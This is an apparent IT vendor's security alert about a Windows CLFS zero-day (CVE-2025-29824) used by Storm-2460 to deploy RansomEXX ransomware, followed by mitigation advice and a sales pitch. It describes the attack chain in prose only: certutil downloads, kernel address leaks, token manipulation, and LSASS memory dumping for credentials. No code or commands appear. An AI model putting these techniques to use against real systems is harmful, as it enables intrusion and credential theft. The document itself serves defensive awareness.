![Urgent Security Alert: Ransomware Attacks Exploiting Microsoft Zero-Day Vulnerability]({"default":"https://itm-management.vn/wp-content/uploads/2025/04/final_-ransomware-attacks-exploiting-microsoft-zero-day-vulnerability.png","2x":"","mobile":"","responsive":"true"} "Urgent Security Alert: Ransomware Attacks Exploiting Microsoft Zero-Day Vulnerability")
Microsoft has swiftly released a patch to address a critical zero-day privilege escalation vulnerability within the Windows Common Log File System (CLFS).
Key Highlights:
- Critical Vulnerability: Identified as CVE-2025-29824, this flaw allows attackers to gain elevated system privileges, establishing a strong foothold for ransomware deployment.
- Threat Actor: The attack campaign is attributed to the Storm-2460 group, who are utilizing the PipeMagic malware to distribute their ransomware payloads.
- Diverse Targets: Attacks have been recorded against organizations in the information technology sector, real estate (USA), finance (Venezuela), a software company (Spain), and the retail industry (Saudi Arabia).
- Rapid Response: Microsoft issued an emergency security patch on April 8, 2025, to resolve and mitigate the impact of this actively exploited vulnerability.
Decoding the Attack Chain:
The CLFS vulnerability enables attackers to exploit weaknesses in the core Windows kernel driver, granting them higher-level access than their initial entry point. Storm-2460 employed advanced techniques, including:
- Kernel Address Leak: Using the NtQuerySystemInformation API to gather sensitive kernel-level memory addresses.
- Token Manipulation: Exploiting the RtlSetAllBits API to effectively seize control of processes.
Notably, Windows 11 (version 24H2) offers enhanced protection against this specific exploit, as access to certain system information crucial for the exploit is restricted to users with SeDebugPrivilege.
Attack Scenario:
Initial Intrusion: Firstly, Attackers used the legitimate certutil utility to download a malicious MSBuild file, hosted on compromised third-party websites. This file contained the encrypted PipeMagic malware.
Privilege Escalation: The CLFS zero-day was subsequently exploited from a dllhost.exe process to achieve elevated access rights.
After successful exploitation: After successful exploitation, the attacker injects code into winlogon.exe, then uses Sysinternals to copy the memory of the LSASS service process (lsass.exe). The purpose of this action is to extract user credentials from the collected memory data.
Ultimately, ransomware was deployed, encrypting victim files and adding random extensions. A ransom note named !READ_ME_REXX2!.txt is presented, containing two .onion domains associated with the RansomEXX ransomware family.
Immediate and Critical Actions:
- Security Update Immediately: Microsoft released security updates to address CVE 2025-29824 . Customers running Windows 11, version 24H2 are not affected
- Enable Cloud-Delivered Protection: Activate and ensure cloud-delivered protection is functioning within Microsoft security solutions (e.g., Microsoft Defender Antivirus). Provides real-time behavioral analysis and detection of the latest threats based on cloud-based intelligence.
- Utilize Device Discovery: Deploy and configure device discovery tools to gain comprehensive visibility into all devices on the network, identifying potentially unmanaged or unpatched systems. To ensures all assets are protected and monitored.
- Run EDR in Block Mode: If you use EDR solutions like Microsoft Defender for Endpoint, configure them to operate in block mode to automatically prevent detected malicious activities to minimizes the impact of attacks by stopping suspicious behavior before damage occurs.
- Enable Full Automation for Investigation and Remediation: Configure security solutions to automatically investigate alerts and take necessary remediation actions without immediate manual intervention. To enables rapid response to threats and reduces the attacker’s dwell time within the system.
- Implement Regular and Secure Data Backups: Establish automated and frequent data backup procedures, ensuring backups are stored securely and separately from the primary system (e.g., offline or in the cloud).
- Access Control: Implement the principle of least privilege, granting only the users and applications the access they need to do their jobs.
- Monitor and Analyze Logs: Set up security log monitoring and analysis systems to detect suspicious activities or early signs of intrusion.
- Enforce Multi-Factor Authentication (MFA): Mandate MFA for all user accounts, especially those with administrative privileges or access to sensitive data.
- Conduct Regular Security Audits: Perform periodic security assessments and penetration testing to identify potential vulnerabilities in systems and applications.
- Enhance User Awareness: Conduct training or provide information to users about ransomware threats, how to identify suspicious emails or attachments, and the importance of adhering to security policies.
Protect Your Organization with ITM’s Advanced Security Solutions
In today’s rapidly evolving threat landscape, vigilance and proactive measures are essential. Microsoft’s swift response to the zero-day exploit and ransomware campaign highlights the need for robust security strategies. To further safeguard your organization or address any IT concerns, don’t hesitate to reach out to us. With ITM, you can enhance your defenses and stay one step ahead of cyber threats.
Take Action Now – Explore ITM’s Security Services and Secure your digital assets today!
